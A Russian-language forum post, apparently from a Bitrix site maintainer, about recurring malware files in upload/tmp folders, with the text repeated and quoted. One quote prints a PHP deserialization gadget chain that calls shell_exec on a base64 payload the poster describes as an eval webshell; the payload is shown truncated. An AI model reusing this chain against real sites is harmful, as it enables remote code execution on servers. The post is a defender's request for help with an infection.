Доброго времени суток.
Столкнулся со следующим: есть несколько сайтов на поддержке, с разной степенью свежести (в плане ядра), но на некоторых появились вирусы, причем одинаковые. Пытался разобраться, откуда и как могли попасть - формы вроде все закрыты, с проверками, нестандартных механизмов не используется.
Вот что нашел у всех:
В папке upload/tmp/ появились папки вида /BXTEMP-2023-03-12/21/bxu/main/2357e58a5cae834135f227fb82435761 (дата и гуид - разные), в которых находятся следующие файлы:
номера в названиях тоже отличаются, но файлы есть в каждой папке с гуидом.
По структуре - это сериализованые данные (php сериализация).
содержимое:
CID590.log:
pIndex8190754681405.package
И самый интересный - pIndex8190754681405.package:
В base64 - соответственно код, в котором происходит стандартный eval входящих данных.
Как я понимаю - это механизм какого-то планировщика, которому подсунули данный код.
Судя по тому, что вирус появляется постоянно (в смысле - нахожу и вычищаю подобные файлы антивирусами и вручную, а они снова появляются) - это либо где-то есть механизм, который дергают и снова создаются данные файлы, либо это прописалось в базу.
Соответственно вопрос - можно ли определить - что это за механизм и где просмотреть - не прописан ли в планировщик данный код?
Столкнулся со следующим: есть несколько сайтов на поддержке, с разной степенью свежести (в плане ядра), но на некоторых появились вирусы, причем одинаковые. Пытался разобраться, откуда и как могли попасть - формы вроде все закрыты, с проверками, нестандартных механизмов не используется.
Вот что нашел у всех:
В папке upload/tmp/ появились папки вида /BXTEMP-2023-03-12/21/bxu/main/2357e58a5cae834135f227fb82435761 (дата и гуид - разные), в которых находятся следующие файлы:
Цитата |
---|
CID590.log default pIndex8190754681405.package |
По структуре - это сериализованые данные (php сериализация).
содержимое:
CID590.log:
Цитата |
---|
a:1:{s:13:"executeStatus";s:8:"executed";} |
pIndex8190754681405.package
Цитата |
---|
a:6:{s:3:"CID";s:6:"CID590";s:6:"pIndex";s:19:"pIndex8190754681405";s:10:"filesCount";s:1:"1";s:5:"files";a:2:{s:1:"";s:5:"error";s:8:"default";s:5:"error";}s:13:"executeStatus";s:8:"executed";s:12:"uploadStatus";s:10:"inprogress";} |
Цитата |
---|
O:25:"Bitrix\Main\Entity\Result":2:{s:12:"*isSuccess";b:0;s:9:"*errors";O:36:"Bitrix\Main\UserConsent\DataProvider":1:{s:7:"*data";a:2:{i:0;O:26:"CAdminDraggableBlockEngine":2:{s:10:"*engines";a:1:{i:0;a:1:{s:5:"check";s:10:"shell_exec";}}s:7:"*args";s:523:"echo PD89NDA5NzIzKjIwO2lmKG1kNSgkX0NPT0tJRVtkXSk9PSJcNjFceDM3XDYw |
В base64 - соответственно код, в котором происходит стандартный eval входящих данных.
Как я понимаю - это механизм какого-то планировщика, которому подсунули данный код.
Судя по тому, что вирус появляется постоянно (в смысле - нахожу и вычищаю подобные файлы антивирусами и вручную, а они снова появляются) - это либо где-то есть механизм, который дергают и снова создаются данные файлы, либо это прописалось в базу.
Соответственно вопрос - можно ли определить - что это за механизм и где просмотреть - не прописан ли в планировщик данный код?